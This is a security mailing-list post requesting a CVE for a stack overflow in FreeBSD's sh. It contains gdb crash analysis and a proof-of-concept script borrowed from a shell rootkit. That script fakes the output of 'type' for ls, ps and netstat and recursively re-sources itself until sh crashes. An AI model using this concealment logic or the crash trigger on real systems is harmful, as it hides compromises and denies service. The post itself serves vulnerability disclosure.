oss-sec mailing list archives
CVE request: freebsd/sh stack overflow vulnerability
From: wzt wzt <wzt.wzt () gmail com>
Date: Tue, 31 Mar 2015 18:42:01 +0800
hi: I found sh have a stack overflow bug on freebsd(9.0-10.0), it may be triggered on all freebsd systems, but i have not tested yet. the poc below is tested on freebsd10.0 amd64 arch: $ ls brootkit.sh $ . brootkit.sh $ command $ ls brootkit.sh sh.core (gdb) x/16x $rsp+0x1b8 0x7fffdfffeff8: Cannot access memory at address 0x7fffdfffeff8 (gdb) x/16x $rsp+0x1c0 0x7fffdffff000: 0x0000000000000000 0x0000000000000000 0x7fffdffff010: 0x0000000000000000 0x0000000000000000 0x7fffdffff020: 0x0000000000000000 0x0000000000000000 0x7fffdffff030: 0x0000000000000000 0x0000000000000000 0x7fffdffff040: 0x0000000000000000 0x0000000000000000 0x7fffdffff050: 0x0000000000000000 0x0000000000000000 0x7fffdffff060: 0x0000000000000000 0x0000000000000000 0x7fffdffff070: 0x0000000000000000 0x0000000000000000 (gdb) disass malloc malloc+32 Dump of assembler code from 0x800d593f0 to 0x800d59410: 0x0000000800d593f0 <malloc+0>: push %rbp 0x0000000800d593f1 <malloc+1>: mov %rsp,%rbp 0x0000000800d593f4 <malloc+4>: push %r15 0x0000000800d593f6 <malloc+6>: push %r14 0x0000000800d593f8 <malloc+8>: push %r13 0x0000000800d593fa <malloc+10>: push %r12 0x0000000800d593fc <malloc+12>: push %rbx 0x0000000800d593fd <malloc+13>: sub $0x488,%rsp 0x0000000800d59404 <malloc+20>: mov %rdi,-0x4a0(%rbp) 0x0000000800d5940b <malloc+27>: mov 0x2c2dbe(%rip),%rax # 0x80101c1d0 <__nsdefaultsrc+4928> set $i=0 set $addr=$rbp while ($i <= 1000) printf "frame[%d] 0x%lx ==> 0x%lx retaddr: 0x%lx\t diass: ", $i, $addr, *(long *)$addr, *(long *)($addr+8) x/i *(long *)($addr+8) set $i=$i+1 set $addr=*(long *)$addr end frame[98] 0x7fffe0004c00 ==> 0x7fffe0004d60 retaddr: 0x406465 diass: 0x406465 <execve@plt+14073>: incq 0x21d694(%rip) # 0x623b00 <environ+64> frame[99] 0x7fffe0004d60 ==> 0x7fffe0004e10 retaddr: 0x40513b diass: 0x40513b <execve@plt+9167>: mov -0x74(%rbp),%r14d frame[100] 0x7fffe0004e10 ==> 0x7fffe0004ec0 retaddr: 0x405118 diass: 0x405118 <execve@plt+9132>: cmpl $0x0,0x21e9f5(%rip) # 0x623b14 <environ+84> poc: #!/bin/sh BR_ROOTKIT_PATH="." builtin() { local fake_a unset command case $1 in "set"|"unset"|"command"|"type") fake_a="$(command builtin $1 $2)" br_hide_engine "$fake_a" reset_command return ;; "builtin") echo "sh: builtin: builtin: syntax error, sh is not support." reset_command return ;; *) command builtin $1 $2 reset_command ;; esac } type() { case $1 in "builtin"|"set"|"unset"|"type") echo "$1 is a shell builtin" return ;; "dir") echo "dir is /usr/bin/dir" return ;; "ls") echo "ls is aliased to ls --color=tty" return ;; "ps") echo "ps is /bin/ps" return ;; "netstat") echo "netstat is hashed (/usr/bin/netstat)" return ;; "/bin/ls"|"/usr/bin/dir"|"/bin/ps"|"/usr/bin/netstat") echo "$1 is $1" return ;; *) unset command command type $1 $2 reset_command return ;; esac } fake_unset() { case $1 in "builtin"|"command"|"set"|"unset"|"type") echo "sh: syntax error, sh is not support." return ;; *) unset $1 $2 return ;; esac } fake_command() { case $1 in "builtin"|"command"|"set"|"unset"|"type") echo "sh: syntax error, sh is not support." return ;; *) unset command command $1 $2 reset_command return ;; esac } command() { case $1 in "builtin") builtin $2 $3 return ;; "unset") fake_unset $2 $3 . $BR_ROOTKIT_PATH/brootkit.sh return ;; "type") type $2 $3 return ;; "command") fake_command $2 $3 return ;; *) unset command command $2 $3 . $BR_ROOTKIT_PATH/brootkit.sh return ;; esac } reset_command() { command() { case $1 in "builtin") builtin $2 $3 return ;; "set") set $2 $3 return ;; "unset") fake_unset $2 $3 . $BR_ROOTKIT_PATH/brootkit.sh return ;; "type") type $2 $3 return ;; "command") fake_command $2 $3 return ;; *) unset command command $2 $3 . $BR_ROOTKIT_PATH/brootkit.sh return ;; esac } }
Current thread:
- CVE request: freebsd/sh stack overflow vulnerability wzt wzt (Mar 31)